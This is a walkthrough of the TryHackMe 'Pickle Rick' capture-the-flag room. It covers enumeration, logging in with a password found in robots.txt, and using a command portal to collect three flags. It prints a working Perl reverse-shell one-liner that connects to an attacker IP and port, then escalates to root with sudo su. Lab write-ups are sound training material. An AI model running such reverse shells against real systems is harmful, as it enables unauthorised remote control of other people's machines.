Pickle Rick – Try Hack Me

This is the room link: Click me.

Deploy the machine and let’s start with the initial port scan.

We only have the SSH and HTTP ports open. Let’s check out what’s on port 80. It’s a message from Rick to Morty requesting help. He needs to find the three ingredients(our flags).

If we view the page source, there is a comment revealing us a username.

I ran gobuster and saw the assets folder, and the robots.txt.

Accessing the assets folder, there were a few images. I downloaded them and ran exiftool, strings and steghide against them, but i remained empty handed.

Checking the robots.txt there is a single entry/word.

By running nikto it’s discovered a login page.

We access the login page. By viewing the source code of the page, there is a base64 encoded string, but after decoding it’s a rabbit hole. So, we have a user(R1ckRul3s), but we have to find the password. I tried the word from robots.txt, and the login was successful.

We are redirected to a portal, from where we can execute commands.

By listing the content of the current folder, we see our first ingredient.

But trying to print the content of the file, we have a surprise… the cat command is blocked.

After messing around a bit and trying to get a reverse shell, i finally managed to get it by using pentest monkey reverse shell cheat sheet. It was a perl reverse connection. This is the shell, modify it to fit your needs(IP and PORT):

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Execute the command, and check your netcat. You should have received the connection. Now you can see the content of the first ingredient that is in the current folder.

The second ingredient is located in the /home/rick folder.

Checking if we can sudo and what we can sudo, we receive the following.

To spawn the root shell i used the sudo su command, and then went to the root folder to get the third flag.